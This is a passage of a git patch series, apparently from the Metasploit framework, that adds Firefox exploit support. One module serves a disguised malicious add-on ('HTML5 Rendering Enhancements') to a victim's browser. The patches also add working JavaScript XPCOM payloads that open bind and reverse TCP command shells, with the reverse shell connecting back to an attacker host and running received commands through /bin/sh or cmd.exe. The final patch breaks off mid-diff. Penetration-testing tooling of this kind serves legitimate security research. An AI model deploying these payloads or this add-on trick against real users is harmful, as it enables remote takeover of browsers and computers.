From 694cb11025aa34ae958c49714e452537dbffe7a0 Mon Sep 17 00:00:00 2001
From: Joe Vennix <joev@metasploit.com>
Date: Thu, 2 Jan 2014 01:10:08 -0600
Subject: [PATCH 01/24] Add firefox platform, architecture, and payload.

* Enables chrome privilege exploits in firefox to run a javascript cmd
shell session without touching the disk.
* Adds a spec for the addon_generator.
---
 .../exploit/remote/firefox_addon_generator.rb | 90 +++++++++++--------
 lib/msf/core/module/platform.rb               |  8 ++
 lib/rex/constants.rb                          | 50 ++++++-----
 .../browser/firefox_xpi_bootstrapped_addon.rb | 50 +++++------
 .../remote/firefox_addon_generator_spec.rb    | 38 ++++++++
 5 files changed, 149 insertions(+), 87 deletions(-)
 create mode 100644 spec/lib/msf/core/exploit/remote/firefox_addon_generator_spec.rb

diff --git a/lib/msf/core/exploit/remote/firefox_addon_generator.rb b/lib/msf/core/exploit/remote/firefox_addon_generator.rb
index 85d3d879db..fc226c2245 100644
--- a/lib/msf/core/exploit/remote/firefox_addon_generator.rb
+++ b/lib/msf/core/exploit/remote/firefox_addon_generator.rb
@@ -10,63 +10,76 @@
 module Msf
 module Exploit::Remote::FirefoxAddonGenerator
 
+  # for calling #generate_payload_exe
+  include Msf::Exploit::EXE
+
   # Add in the supported datastore options
-  def initialize( info = {} )
+  def initialize(info = {})
     super(update_info(info,
       'Platform'      => %w{ java linux osx solaris win },
       'Payload'       => { 'BadChars' => '', 'DisableNops' => true },
       'Targets'       =>
         [
-          [ 'Generic (Java Payload)',
+          [ 'Universal (Javascript XPCOM Shell)',
             {
-              'Platform' => ['java'],
+              'Platform' => 'firefox',
+              'Arch' => 'firefox'
+            }
+          ],
+          [ 'Java Payload',
+            {
+              'Platform' => 'java',
               'Arch' => ARCH_JAVA
             }
           ],
           [ 'Windows x86 (Native Payload)',
             {
               'Platform' => 'win',
-              'Arch' => ARCH_X86,
+              'Arch' => ARCH_X86
             }
           ],
           [ 'Linux x86 (Native Payload)',
             {
               'Platform' => 'linux',
-              'Arch' => ARCH_X86,
+              'Arch' => ARCH_X86
             }
           ],
           [ 'Mac OS X PPC (Native Payload)',
             {
               'Platform' => 'osx',
-              'Arch' => ARCH_PPC,
+              'Arch' => ARCH_PPC
             }
           ],
           [ 'Mac OS X x86 (Native Payload)',
             {
               'Platform' => 'osx',
-              'Arch' => ARCH_X86,
+              'Arch' => ARCH_X86
             }
           ]
         ],
-      'DefaultTarget'  => 1
+      'DefaultTarget' => 0
     ))
 
-    register_options( [
-      OptString.new('ADDONNAME', [ true,
-        "The addon name.",
-        "HTML5 Rendering Enhancements"
-        ]),
+    register_options([
+      OptString.new('ADDONNAME', [ true, "The addon name.", "HTML5 Rendering Enhancements" ]),
       OptBool.new('AutoUninstall', [ true,
         "Automatically uninstall the addon after payload execution",
         true
-        ])
+      ])
     ], self.class)
   end
 
   # @return [Rex::Zip::Archive] containing a .xpi, ready to be served with the
   # 'application/x-xpinstall' MIME type
-  def generate_addon_xpi
-    if target.name == 'Generic (Java Payload)'
+  # @return nil if payload fails to generate
+  def generate_addon_xpi(cli)
+    if target.name =~ /Javascript/
+      payload_file = nil
+      payload_name = Rex::Text.rand_text_alphanumeric(8) + '.exe'
+      payload_script = regenerate_payload(cli).encoded
+    elsif target.name =~ /Java /
+      p = regenerate_payload(cli)
+      return nil if p.nil?
       jar = p.encoded_jar
       jar.build_manifest(:main_class => "metasploit.Payload")
       payload_file = jar.pack
@@ -80,6 +93,7 @@ module Exploit::Remote::FirefoxAddonGenerator
       |
     else
       payload_file = generate_payload_exe
+      return nil if payload_file.nil?
       payload_name = Rex::Text.rand_text_alphanumeric(8) + '.exe'
       payload_script=%q|
   var process=Components.classes["@mozilla.org/process/util;1"].createInstance(Components.interfaces.nsIProcess);
@@ -98,26 +112,30 @@ module Exploit::Remote::FirefoxAddonGenerator
     end
 
     zip = Rex::Zip::Archive.new
+    bootstrap_script = 'function startup(data, reason) {'
     xpi_guid = Rex::Text.rand_guid
-    bootstrap_script = %q|
-function startup(data, reason) {
-  var file = Components.classes["@mozilla.org/file/directory_service;1"].
-          getService(Components.interfaces.nsIProperties).
-          get("ProfD", Components.interfaces.nsIFile);
-  file.append("extensions");
-    |
-    bootstrap_script << %Q|xpi_guid="#{xpi_guid}";|
-    bootstrap_script << %Q|payload_name="#{payload_name}";|
-    bootstrap_script << %q|
-  file.append(xpi_guid);
-  file.append(payload_name);
-  var tmp = Components.classes["@mozilla.org/file/directory_service;1"].
-          getService(Components.interfaces.nsIProperties).
-          get("TmpD", Components.interfaces.nsIFile);
-  tmp.append(payload_name);
-  tmp.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE, 0666);
-  file.copyTo(tmp.parent, tmp.leafName);
-    |
+
+    if target.name !~ /Javascript/
+      bootstrap_script << %q|
+    var file = Components.classes["@mozilla.org/file/directory_service;1"].
+            getService(Components.interfaces.nsIProperties).
+            get("ProfD", Components.interfaces.nsIFile);
+    file.append("extensions");
+      |
+      bootstrap_script << %Q|xpi_guid="#{xpi_guid}";|
+      bootstrap_script << %Q|payload_name="#{payload_name}";|
+      bootstrap_script << %q|
+    file.append(xpi_guid);
+    file.append(payload_name);
+    var tmp = Components.classes["@mozilla.org/file/directory_service;1"].
+            getService(Components.interfaces.nsIProperties).
+            get("TmpD", Components.interfaces.nsIFile);
+    tmp.append(payload_name);
+    tmp.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE, 0666);
+    file.copyTo(tmp.parent, tmp.leafName);
+      |
+    end
+
     bootstrap_script << payload_script
 
     if (datastore['AutoUninstall'])
@@ -137,7 +155,7 @@ function startup(data, reason) {
     bootstrap_script << "}"
 
     zip.add_file('bootstrap.js', bootstrap_script)
-    zip.add_file(payload_name, payload_file)
+    zip.add_file(payload_name, payload_file) unless payload_file.nil?
     zip.add_file('chrome.manifest', "content\t#{xpi_guid}\t./\noverlay\tchrome://browser/content/browser.xul\tchrome://#{xpi_guid}/content/overlay.xul\n")
     zip.add_file('install.rdf', %Q|<?xml version="1.0"?>
 <RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:em="http://www.mozilla.org/2004/em-rdf#">
diff --git a/lib/msf/core/module/platform.rb b/lib/msf/core/module/platform.rb
index ee8122d531..af8bc8b450 100644
--- a/lib/msf/core/module/platform.rb
+++ b/lib/msf/core/module/platform.rb
@@ -516,4 +516,12 @@ class Msf::Module::Platform
     Rank = 100
     Alias = "nodejs"
   end
+
+  #
+  # Node.js
+  #
+  class Firefox < Msf::Module::Platform
+    Rank = 100
+    Alias = "firefox"
+  end
 end
diff --git a/lib/rex/constants.rb b/lib/rex/constants.rb
index 93aa1f4603..049a6801b5 100644
--- a/lib/rex/constants.rb
+++ b/lib/rex/constants.rb
@@ -64,29 +64,30 @@ LEV_3     = 3
 #
 # Architecture constants
 #
-ARCH_ANY    = '_any_'
-ARCH_X86    = 'x86'
-ARCH_X86_64 = 'x86_64'
-ARCH_X64    = 'x64' # To be used for compatability with ARCH_X86_64
-ARCH_MIPS   = 'mips'
-ARCH_MIPSLE = 'mipsle'
-ARCH_MIPSBE = 'mipsbe'
-ARCH_PPC    = 'ppc'
-ARCH_PPC64  = 'ppc64'
-ARCH_CBEA   = 'cbea'
-ARCH_CBEA64 = 'cbea64'
-ARCH_SPARC  = 'sparc'
-ARCH_CMD    = 'cmd'
-ARCH_PHP    = 'php'
-ARCH_TTY    = 'tty'
-ARCH_ARMLE  = 'armle'
-ARCH_ARMBE  = 'armbe'
-ARCH_JAVA   = 'java'
-ARCH_RUBY   = 'ruby'
-ARCH_DALVIK = 'dalvik'
-ARCH_PYTHON = 'python'
-ARCH_NODEJS = 'nodejs'
-ARCH_TYPES  =
+ARCH_ANY     = '_any_'
+ARCH_X86     = 'x86'
+ARCH_X86_64  = 'x86_64'
+ARCH_X64     = 'x64' # To be used for compatability with ARCH_X86_64
+ARCH_MIPS    = 'mips'
+ARCH_MIPSLE  = 'mipsle'
+ARCH_MIPSBE  = 'mipsbe'
+ARCH_PPC     = 'ppc'
+ARCH_PPC64   = 'ppc64'
+ARCH_CBEA    = 'cbea'
+ARCH_CBEA64  = 'cbea64'
+ARCH_SPARC   = 'sparc'
+ARCH_CMD     = 'cmd'
+ARCH_PHP     = 'php'
+ARCH_TTY     = 'tty'
+ARCH_ARMLE   = 'armle'
+ARCH_ARMBE   = 'armbe'
+ARCH_JAVA    = 'java'
+ARCH_RUBY    = 'ruby'
+ARCH_DALVIK  = 'dalvik'
+ARCH_PYTHON  = 'python'
+ARCH_NODEJS  = 'nodejs'
+ARCH_FIREFOX = 'firefox'
+ARCH_TYPES   =
   [
     ARCH_X86,
     ARCH_X86_64,
@@ -107,7 +108,8 @@ ARCH_TYPES  =
     ARCH_RUBY,
     ARCH_DALVIK,
     ARCH_PYTHON,
-    ARCH_NODEJS
+    ARCH_NODEJS,
+    ARCH_FIREFOX
   ]
 
 ARCH_ALL = ARCH_TYPES
diff --git a/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb b/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb
index fde97006f6..5fc3882cfb 100644
--- a/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb
+++ b/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb
@@ -11,7 +11,6 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpServer::HTML
-  include Msf::Exploit::EXE
   include Msf::Exploit::Remote::FirefoxAddonGenerator
 
   def initialize( info = {} )
@@ -20,7 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'Description'   => %q{
           This exploit dynamically creates a .xpi addon file.
         The resulting bootstrapped Firefox addon is presented to
-        the victim via a web page with.  The victim's Firefox browser
+        the victim via a web page. The victim's Firefox browser
         will pop a dialog asking if they trust the addon.
 
         Once the user clicks "install", the addon is installed and
@@ -31,7 +30,7 @@ class Metasploit3 < Msf::Exploit::Remote
         uninstall the addon once the payload has been executed.
       },
       'License'       => MSF_LICENSE,
-      'Author'        => [ 'mihi' ],
+      'Author'        => [ 'mihi', 'joev' ],
       'References'    =>
         [
           [ 'URL', 'https://developer.mozilla.org/en/Extensions/Bootstrapped_extensions' ],
@@ -41,33 +40,30 @@ class Metasploit3 < Msf::Exploit::Remote
     ))
   end
 
-  def on_request_uri( cli, request )
-    if not request.uri.match(/\.xpi$/i)
-      if not request.uri.match(/\/$/)
-        send_redirect( cli, get_resource() + '/', '')
-        return
+  def on_request_uri(cli, request)
+    if request.uri.match(/\.xpi$/i)
+      # browser has navigated to the .xpi file
+      print_status("Sending xpi and waiting for user to click 'accept'...")
+      if not xpi = generate_addon_xpi(cli)
+        print_error("Failed to generate the payload.")
+        send_not_found(cli)
+      else
+        send_response(cli, xpi.pack, { 'Content-Type' => 'application/x-xpinstall' })
+      end
+    else
+      # initial browser request
+      # force the user to access a directory-like URL
+      if not request.uri.match(/\/$/)
+        print_status("Redirecting request." )
+        send_redirect(cli, "#{get_resource}/")
+      else
+        # user has navigated
+        print_status("Sending response HTML." )
+        send_response_html(cli, generate_html)
       end
-
-      print_status("Handling request..." )
-
-      send_response_html( cli, generate_html, { 'Content-Type' => 'text/html' } )
-      return
     end
 
-    # If we haven't returned yet, then this is a request for our xpi,
-    # so build one
-    p = regenerate_payload(cli)
-    if not p
-      print_error("Failed to generate the payload.")
-      # Send them a 404 so the browser doesn't hang waiting for data
-      # that will never come.
-      send_not_found(cli)
-      return
-    end
-
-    print_status("Sending xpi and waiting for user to click 'accept'...")
-    send_response( cli, generate_addon_xpi.pack, { 'Content-Type' => 'application/x-xpinstall' } )
-    handler( cli )
+    handler(cli)
   end
 
   def generate_html
diff --git a/spec/lib/msf/core/exploit/remote/firefox_addon_generator_spec.rb b/spec/lib/msf/core/exploit/remote/firefox_addon_generator_spec.rb
new file mode 100644
index 0000000000..519175e827
--- /dev/null
+++ b/spec/lib/msf/core/exploit/remote/firefox_addon_generator_spec.rb
@@ -0,0 +1,38 @@
+require 'spec_helper'
+require 'msf/core'
+
+describe Msf::Exploit::Remote::FirefoxAddonGenerator do
+  let(:datastore) { { 'TARGET' => 0 } }
+  let(:jar) {
+    j = double(:pack => '@JAR@')
+    j.stub(:build_manifest)
+    j
+  }
+  let(:payload) { double(:encoded => '@EXE@', :encoded_jar => jar) }
+  let(:framework) { double(:nops => nil) }
+  let(:cli) { double }
+
+  subject(:mod) do
+    mod = Msf::Exploit::Remote.allocate
+    mod.extend described_class
+    mod.extend Msf::Exploit::Remote::BrowserExploitServer
+    mod.send(:initialize, {})
+    mod.stub(
+      :payload => payload,
+      :regenerate_payload => payload,
+      :framework => framework,
+      :datastore => datastore
+    )
+    mod
+  end
+
+  describe '#generate_addon_xpi' do
+    let(:xpi) { mod.generate_addon_xpi(cli) }
+
+    it { should respond_to :generate_addon_xpi }
+
+    it 'should return an instance of Rex::Zip::Archive' do
+      xpi.should be_kind_of Rex::Zip::Archive
+    end
+  end
+end

From 821aa47d7e22e0c28215eafb3e50c4983c4cfae1 Mon Sep 17 00:00:00 2001
From: Joe Vennix <joev@metasploit.com>
Date: Thu, 2 Jan 2014 02:09:16 -0600
Subject: [PATCH 02/24] Add firefox paylods.

* Adds support for windows or posix shell escaping.
---
 .../singles/firefox/shell_bind_tcp.rb         | 148 ++++++++++++++++++
 .../singles/firefox/shell_reverse_tcp.rb      | 140 +++++++++++++++++
 2 files changed, 288 insertions(+)
 create mode 100644 modules/payloads/singles/firefox/shell_bind_tcp.rb
 create mode 100644 modules/payloads/singles/firefox/shell_reverse_tcp.rb

diff --git a/modules/payloads/singles/firefox/shell_bind_tcp.rb b/modules/payloads/singles/firefox/shell_bind_tcp.rb
new file mode 100644
index 0000000000..67137085e7
--- /dev/null
+++ b/modules/payloads/singles/firefox/shell_bind_tcp.rb
@@ -0,0 +1,148 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+# It would be better to have a commonjs payload, but because the implementations
+# differ so greatly when it comes to require() paths for net modules, we will
+# settle for just getting shells on nodejs.
+
+require 'msf/core'
+require 'msf/core/handler/bind_tcp'
+require 'msf/base/sessions/command_shell'
+
+module Metasploit3
+
+  include Msf::Payload::Single
+  include Msf::Sessions::CommandShellOptions
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'          => 'Command Shell, Bind TCP (via Firefox XPCOM script)',
+      'Description'   => 'Creates an interactive shell via Javascript with access to Firefox\'s XPCOM API',
+      'Author'        => ['joev'],
+      'License'       => BSD_LICENSE,
+      'Platform'      => 'firefox',
+      'Arch'          => ARCH_FIREFOX,
+      'Handler'       => Msf::Handler::BindTcp,
+      'Session'       => Msf::Sessions::CommandShell,
+      'PayloadType'   => 'firefox',
+      'Payload'       => { 'Offsets' => {}, 'Payload' => '' }
+    ))
+  end
+
+  #
+  # Constructs the payload
+  #
+  def generate
+    super + command_string
+  end
+
+  #
+  # Returns the JS string to use for execution
+  #
+  def command_string
+    %Q|
+    (function(){
+      Components.utils.import("resource://gre/modules/NetUtil.jsm");
+
+      var ua = Components.classes["@mozilla.org/network/protocol;1?name=http"]
+        .getService(Components.interfaces.nsIHttpProtocolHandler).userAgent;
+
+      var lport = #{datastore["LPORT"]};
+      var rhost = "#{datastore['RHOST']}";
+      var serverSocket = Components.classes["@mozilla.org/network/server-socket;1"]
+                             .createInstance(Components.interfaces.nsIServerSocket);
+      serverSocket.init(lport, false, -1);
+      var clientFound = false;
+
+      var listener = {
+        onSocketAccepted: function(serverSocket, clientSocket) {
+          var outStream = clientSocket.openOutputStream(0, 0, 0);
+          var inStream = clientSocket.openInputStream(0, 0, 0);
+          if (clientFound) { outStream.close(); inStream.close(); }
+          client = true;
+          var pump = Components.classes["@mozilla.org/network/input-stream-pump;1"]
+                     .createInstance(Components.interfaces.nsIInputStreamPump);
+          pump.init(inStream, -1, -1, 0, 0, true);
+          pump.asyncRead(clientListener(outStream), null);
+        }
+      };
+
+      var clientListener = function(outStream) {
+        return {
+          onStartRequest: function(request, context) {},
+          onStopRequest: function(request, context) {},
+          onDataAvailable: function(request, context, stream, offset, count) {
+            var data = NetUtil.readInputStreamToString(stream, count).trim();
+            var output = runCmd(data);
+            outStream.write(output[0], output[0].length);
+          }
+        };
+      };
+
+      var runCmd = function(cmd) {
+        var shPath = "/bin/sh";
+        var shFlag = "-c";
+        var shEsc = "\\\\$&";
+
+        if (ua.indexOf("Windows")>-1) {
+          shPath = "C:\\\\Windows\\\\system32\\\\cmd.exe";
+          shFlag = "/c";
+          shEsc = "\\^$&";
+        }
+
+        var stdoutFile = "#{Rex::Text.rand_text_alphanumeric(8)}";
+        var stderrFile = "#{Rex::Text.rand_text_alphanumeric(8)}";
+
+        var stdout = Components.classes["@mozilla.org/file/directory_service;1"]
+          .getService(Components.interfaces.nsIProperties)
+          .get("TmpD", Components.interfaces.nsIFile);
+        stdout.append(stdoutFile);
+
+        var stderr = Components.classes["@mozilla.org/file/directory_service;1"]
+          .getService(Components.interfaces.nsIProperties)
+          .get("TmpD", Components.interfaces.nsIFile);
+        stderr.append(stderrFile);
+
+        var sh = Components.classes["@mozilla.org/file/local;1"]
+                   .createInstance(Components.interfaces.nsILocalFile);
+        sh.initWithPath(shPath);
+
+        var shell = shPath + " " + shFlag + " " + (cmd + " >"+stdout.path+" 2>"+stderr.path).replace(/\\W/g, shEsc);
+
+        var process = Components.classes["@mozilla.org/process/util;1"]
+          .createInstance(Components.interfaces.nsIProcess);
+        process.init(sh);
+        process.run(true, [shFlag, shell], 2);
+        return [readFile(stdout.path), readFile(stderr.path)];
+      };
+
+      var readFile = function(path) {
+        try {
+          var file = Components.classes["@mozilla.org/file/local;1"]
+                   .createInstance(Components.interfaces.nsILocalFile);
+          file.initWithPath(path);
+
+          var fileStream = Components.classes["@mozilla.org/network/file-input-stream;1"]
+                           .createInstance(Components.interfaces.nsIFileInputStream);
+          fileStream.init(file, 1, 0, false);
+
+          var binaryStream = Components.classes["@mozilla.org/binaryinputstream;1"]
+                             .createInstance(Components.interfaces.nsIBinaryInputStream);
+          binaryStream.setInputStream(fileStream);
+          var array = binaryStream.readByteArray(fileStream.available());
+
+          binaryStream.close();
+          fileStream.close();
+          file.remove(true);
+
+          return array.map(function(aItem) { return String.fromCharCode(aItem); }).join("").trim();
+        } catch (e) { return ["",""]; }
+      };
+
+      serverSocket.asyncListen(listener);
+    })();
+    |
+  end
+end
diff --git a/modules/payloads/singles/firefox/shell_reverse_tcp.rb b/modules/payloads/singles/firefox/shell_reverse_tcp.rb
new file mode 100644
index 0000000000..17ba2e16d4
--- /dev/null
+++ b/modules/payloads/singles/firefox/shell_reverse_tcp.rb
@@ -0,0 +1,140 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+# It would be better to have a commonjs payload, but because the implementations
+# differ so greatly when it comes to require() paths for net modules, we will
+# settle for just getting shells on nodejs.
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/command_shell'
+
+module Metasploit3
+
+  include Msf::Payload::Single
+  include Msf::Sessions::CommandShellOptions
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'          => 'Command Shell, Reverse TCP (via Firefox XPCOM script)',
+      'Description'   => 'Creates an interactive shell via Javascript with access to Firefox\'s XPCOM API',
+      'Author'        => ['joev'],
+      'License'       => BSD_LICENSE,
+      'Platform'      => 'firefox',
+      'Arch'          => ARCH_FIREFOX,
+      'Handler'       => Msf::Handler::ReverseTcp,
+      'Session'       => Msf::Sessions::CommandShell,
+      'PayloadType'   => 'firefox',
+      'Payload'       => { 'Offsets' => {}, 'Payload' => '' }
+    ))
+  end
+
+  #
+  # Constructs the payload
+  #
+  def generate
+    super + command_string
+  end
+
+  #
+  # Returns the JS string to use for execution
+  #
+  def command_string
+    %Q|
+    (function(){
+      Components.utils.import("resource://gre/modules/NetUtil.jsm");
+
+      var ua = Components.classes["@mozilla.org/network/protocol;1?name=http"]
+        .getService(Components.interfaces.nsIHttpProtocolHandler).userAgent;
+
+      var host = '#{datastore["LHOST"]}';
+      var port = #{datastore["LPORT"]};
+
+      var socketTransport = Components.classes["@mozilla.org/network/socket-transport-service;1"]
+                              .getService(Components.interfaces.nsISocketTransportService);
+      var socket = socketTransport.createTransport(null, 0, host, port, null);
+      var outStream = socket.openOutputStream(0, 0, 0);
+      var inStream = socket.openInputStream(0, 0, 0);
+
+      var pump = Components.classes["@mozilla.org/network/input-stream-pump;1"]
+                     .createInstance(Components.interfaces.nsIInputStreamPump);
+      pump.init(inStream, -1, -1, 0, 0, true);
+
+      var listener = {
+        onStartRequest: function(request, context) {},
+        onStopRequest: function(request, context) {},
+        onDataAvailable: function(request, context, stream, offset, count)
+        {
+          var data = NetUtil.readInputStreamToString(stream, count).trim();
+          var output = runCmd(data);
+          outStream.write(output[0], output[0].length);
+          outStream.flush();
+        }
+      };
+
+      var runCmd = function(cmd) {
+        var shPath = "/bin/sh";
+        var shFlag = "-c";
+        var shEsc = "\\\\$&";
+
+        if (ua.indexOf("Windows")>-1) {
+          shPath = "C:\\\\Windows\\\\system32\\\\cmd.exe";
+          shFlag = "/c";
+          shEsc = "\\^$&";
+        }
+
+        var stdoutFile = "#{Rex::Text.rand_text_alphanumeric(8)}";
+        var stderrFile = "#{Rex::Text.rand_text_alphanumeric(8)}";
+
+        var stdout = Components.classes["@mozilla.org/file/directory_service;1"]
+          .getService(Components.interfaces.nsIProperties)
+          .get("TmpD", Components.interfaces.nsIFile);
+        stdout.append(stdoutFile);
+
+        var stderr = Components.classes["@mozilla.org/file/directory_service;1"]
+          .getService(Components.interfaces.nsIProperties)
+          .get("TmpD", Components.interfaces.nsIFile);
+        stderr.append(stderrFile);
+
+        var sh = Components.classes["@mozilla.org/file/local;1"]
+                   .createInstance(Components.interfaces.nsILocalFile);
+        sh.initWithPath(shPath);
+
+        var shell = shPath + " " + shFlag + " " + (cmd + " >"+stdout.path+" 2>"+stderr.path).replace(/\\W/g, shEsc);
+        var process = Components.classes["@mozilla.org/process/util;1"]
+          .createInstance(Components.interfaces.nsIProcess);
+        process.init(sh);
+        process.run(true, [shFlag, shell], 2);
+        return [readFile(stdout.path), readFile(stderr.path)];
+      };
+
+      var readFile = function(path) {
+        try {
+          var file = Components.classes["@mozilla.org/file/local;1"]
+                   .createInstance(Components.interfaces.nsILocalFile);
+          file.initWithPath(path);
+
+          var fileStream = Components.classes["@mozilla.org/network/file-input-stream;1"]
+                           .createInstance(Components.interfaces.nsIFileInputStream);
+          fileStream.init(file, 1, 0, false);
+
+          var binaryStream = Components.classes["@mozilla.org/binaryinputstream;1"]
+                             .createInstance(Components.interfaces.nsIBinaryInputStream);
+          binaryStream.setInputStream(fileStream);
+          var array = binaryStream.readByteArray(fileStream.available());
+
+          binaryStream.close();
+          fileStream.close();
+          file.remove(true);
+
+          return array.map(function(aItem) { return String.fromCharCode(aItem); }).join("").trim();
+        } catch (e) { return ""; }
+      };
+
+      pump.asyncRead(listener, null);
+    })();
+    |
+  end
+end

From 1f9ac12dda78c9040d459ed7ae07b6c65c978a2b Mon Sep 17 00:00:00 2001
From: Joe Vennix <joev@metasploit.com>
Date: Thu, 2 Jan 2014 02:20:54 -0600
Subject: [PATCH 03/24] DRYs up firefox payloads.

---
 lib/msf/core/payload/firefox.rb               | 74 +++++++++++++++++++
 .../singles/firefox/shell_bind_tcp.rb         | 70 +-----------------
 .../singles/firefox/shell_reverse_tcp.rb      | 65 +---------------
 3 files changed, 81 insertions(+), 128 deletions(-)
 create mode 100644 lib/msf/core/payload/firefox.rb

diff --git a/lib/msf/core/payload/firefox.rb b/lib/msf/core/payload/firefox.rb
new file mode 100644
index 0000000000..ba22ba35a7
--- /dev/null
+++ b/lib/msf/core/payload/firefox.rb
@@ -0,0 +1,74 @@
+# -*- coding: binary -*-
+require 'msf/core'
+
+module Msf::Payload::Firefox
+  def read_file_source
+    %q|
+      var readFile = function(path) {
+        try {
+          var file = Components.classes["@mozilla.org/file/local;1"]
+                   .createInstance(Components.interfaces.nsILocalFile);
+          file.initWithPath(path);
+
+          var fileStream = Components.classes["@mozilla.org/network/file-input-stream;1"]
+                           .createInstance(Components.interfaces.nsIFileInputStream);
+          fileStream.init(file, 1, 0, false);
+
+          var binaryStream = Components.classes["@mozilla.org/binaryinputstream;1"]
+                             .createInstance(Components.interfaces.nsIBinaryInputStream);
+          binaryStream.setInputStream(fileStream);
+          var array = binaryStream.readByteArray(fileStream.available());
+
+          binaryStream.close();
+          fileStream.close();
+          file.remove(true);
+
+          return array.map(function(aItem) { return String.fromCharCode(aItem); }).join("").trim();
+        } catch (e) { return ["",""]; }
+      };
+    |
+  end
+
+  def run_cmd_source
+    %q|
+      var ua = Components.classes["@mozilla.org/network/protocol;1?name=http"]
+        .getService(Components.interfaces.nsIHttpProtocolHandler).userAgent;
+      var runCmd = function(cmd) {
+        var shPath = "/bin/sh";
+        var shFlag = "-c";
+        var shEsc = "\\\\$&";
+
+        if (ua.indexOf("Windows")>-1) {
+          shPath = "C:\\\\Windows\\\\system32\\\\cmd.exe";
+          shFlag = "/c";
+          shEsc = "\\^$&";
+        }
+
+        var stdoutFile = "#{Rex::Text.rand_text_alphanumeric(8)}";
+        var stderrFile = "#{Rex::Text.rand_text_alphanumeric(8)}";
+
+        var stdout = Components.classes["@mozilla.org/file/directory_service;1"]
+          .getService(Components.interfaces.nsIProperties)
+          .get("TmpD", Components.interfaces.nsIFile);
+        stdout.append(stdoutFile);
+
+        var stderr = Components.classes["@mozilla.org/file/directory_service;1"]
+          .getService(Components.interfaces.nsIProperties)
+          .get("TmpD", Components.interfaces.nsIFile);
+        stderr.append(stderrFile);
+
+        var sh = Components.classes["@mozilla.org/file/local;1"]
+                   .createInstance(Components.interfaces.nsILocalFile);
+        sh.initWithPath(shPath);
+
+        var shell = shPath + " " + shFlag + " " + (cmd + " >"+stdout.path+" 2>"+stderr.path).replace(/\\W/g, shEsc);
+
+        var process = Components.classes["@mozilla.org/process/util;1"]
+          .createInstance(Components.interfaces.nsIProcess);
+        process.init(sh);
+        process.run(true, [shFlag, shell], 2);
+        return [readFile(stdout.path), readFile(stderr.path)];
+      };
+    |
+  end
+end
\ No newline at end of file
diff --git a/modules/payloads/singles/firefox/shell_bind_tcp.rb b/modules/payloads/singles/firefox/shell_bind_tcp.rb
index 67137085e7..d3dc07316d 100644
--- a/modules/payloads/singles/firefox/shell_bind_tcp.rb
+++ b/modules/payloads/singles/firefox/shell_bind_tcp.rb
@@ -9,11 +9,13 @@
 
 require 'msf/core'
 require 'msf/core/handler/bind_tcp'
+require 'msf/core/payload/firefox'
 require 'msf/base/sessions/command_shell'
 
 module Metasploit3
 
   include Msf::Payload::Single
+  include Msf::Payload::Firefox
   include Msf::Sessions::CommandShellOptions
 
   def initialize(info = {})
@@ -45,23 +47,16 @@ module Metasploit3
     %Q|
     (function(){
       Components.utils.import("resource://gre/modules/NetUtil.jsm");
-
-      var ua = Components.classes["@mozilla.org/network/protocol;1?name=http"]
-        .getService(Components.interfaces.nsIHttpProtocolHandler).userAgent;
-
       var lport = #{datastore["LPORT"]};
       var rhost = "#{datastore['RHOST']}";
       var serverSocket = Components.classes["@mozilla.org/network/server-socket;1"]
                              .createInstance(Components.interfaces.nsIServerSocket);
       serverSocket.init(lport, false, -1);
-      var clientFound = false;
 
       var listener = {
         onSocketAccepted: function(serverSocket, clientSocket) {
           var outStream = clientSocket.openOutputStream(0, 0, 0);
           var inStream = clientSocket.openInputStream(0, 0, 0);
-          if (clientFound) { outStream.close(); inStream.close(); }
-          client = true;
           var pump = Components.classes["@mozilla.org/network/input-stream-pump;1"]
                      .createInstance(Components.interfaces.nsIInputStreamPump);
           pump.init(inStream, -1, -1, 0, 0, true);
@@ -81,65 +76,8 @@ module Metasploit3
         };
       };
 
-      var runCmd = function(cmd) {
-        var shPath = "/bin/sh";
-        var shFlag = "-c";
-        var shEsc = "\\\\$&";
-
-        if (ua.indexOf("Windows")>-1) {
-          shPath = "C:\\\\Windows\\\\system32\\\\cmd.exe";
-          shFlag = "/c";
-          shEsc = "\\^$&";
-        }
-
-        var stdoutFile = "#{Rex::Text.rand_text_alphanumeric(8)}";
-        var stderrFile = "#{Rex::Text.rand_text_alphanumeric(8)}";
-
-        var stdout = Components.classes["@mozilla.org/file/directory_service;1"]
-          .getService(Components.interfaces.nsIProperties)
-          .get("TmpD", Components.interfaces.nsIFile);
-        stdout.append(stdoutFile);
-
-        var stderr = Components.classes["@mozilla.org/file/directory_service;1"]
-          .getService(Components.interfaces.nsIProperties)
-          .get("TmpD", Components.interfaces.nsIFile);
-        stderr.append(stderrFile);
-
-        var sh = Components.classes["@mozilla.org/file/local;1"]
-                   .createInstance(Components.interfaces.nsILocalFile);
-        sh.initWithPath(shPath);
-
-        var shell = shPath + " " + shFlag + " " + (cmd + " >"+stdout.path+" 2>"+stderr.path).replace(/\\W/g, shEsc);
-
-        var process = Components.classes["@mozilla.org/process/util;1"]
-          .createInstance(Components.interfaces.nsIProcess);
-        process.init(sh);
-        process.run(true, [shFlag, shell], 2);
-        return [readFile(stdout.path), readFile(stderr.path)];
-      };
-
-      var readFile = function(path) {
-        try {
-          var file = Components.classes["@mozilla.org/file/local;1"]
-                   .createInstance(Components.interfaces.nsILocalFile);
-          file.initWithPath(path);
-
-          var fileStream = Components.classes["@mozilla.org/network/file-input-stream;1"]
-                           .createInstance(Components.interfaces.nsIFileInputStream);
-          fileStream.init(file, 1, 0, false);
-
-          var binaryStream = Components.classes["@mozilla.org/binaryinputstream;1"]
-                             .createInstance(Components.interfaces.nsIBinaryInputStream);
